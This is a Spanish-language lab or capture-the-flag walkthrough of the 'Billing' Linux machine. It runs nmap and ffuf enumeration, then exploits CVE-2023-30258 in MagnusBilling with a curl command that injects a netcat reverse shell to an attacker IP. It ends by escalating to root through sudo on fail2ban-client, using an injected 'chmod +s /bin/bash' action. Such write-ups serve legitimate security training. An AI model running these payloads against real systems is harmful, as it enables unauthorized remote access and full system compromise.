BlogTwitterLinkedIn

💵Billing (Linux)

Some mistakes can be costly.

Enumeración de Red

Nmap

Scan general y específico de servicios
sudo nmap -sS --min-rate 5000 -p- --open -vvv -n -Pn 10.10.21.62 -oN puertos
nmap -sCV -p80,3306,5038 10.10.21.62 -oN nmap
Resultado nmap
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey: 
|   256 35:bd:a2:17:f2:46:71:d4:7e:b5:c7:b5:ac:33:15:e8 (ECDSA)
|_  256 46:d6:34:86:cf:cc:d5:c5:87:a8:78:8a:32:95:15:9a (ED25519)
80/tcp   open  http     Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
| http-title:             MagnusBilling        
|_Requested resource was http://10.10.21.62/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
3306/tcp open  mysql    MariaDB 10.3.23 or earlier (unauthorized)
5038/tcp open  asterisk Asterisk Call Manager 2.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeración de Servicio Web

Ffuf

Fuzzing de directorios básico
ffuf -u http://10.10.21.62/mbilling/FUZZ -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c

  • Directory Listing

  • /mbilling/README.mdMagnusBilling version 7

Explotación: CVE-2023-30258 (magnus-billing-v7-exploit)

LogoGitHub - tinashelorenzi/CVE-2023-30258-magnus-billing-v7-exploitGitHub
Exploit para generar reverse shell via parametro democ en icepay.php
curl -s '<http://10.10.21.62/mbilling/lib/icepay/icepay.php>' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.107.26 1234 >/tmp/f;'

Intrusión en el Sistema

Shell: Web service user 'asterisk'

Enumeración Post-Intrusión

Enumerar permisos sudo
sudo -l

  • sudo /usr/bin/fail2ban-clientALL (NO PASSWORD)

Fail2Ban Privilege Escalation

LogoExploit for Fail2Ban 0.11.2 Privilege Escalation / Command ExecutionSploitus_com
Reiniciar el servicio
sudo /usr/bin/fail2ban-client restart
Inyectar acción maliciosa
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport action "chmod +s /bin/bash"
Banear IP cualquiera para activar la actionban
sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
Ejecutar bash como root
/bin/bash -p

Compromiso del Sistema

Shell: Root

Última actualización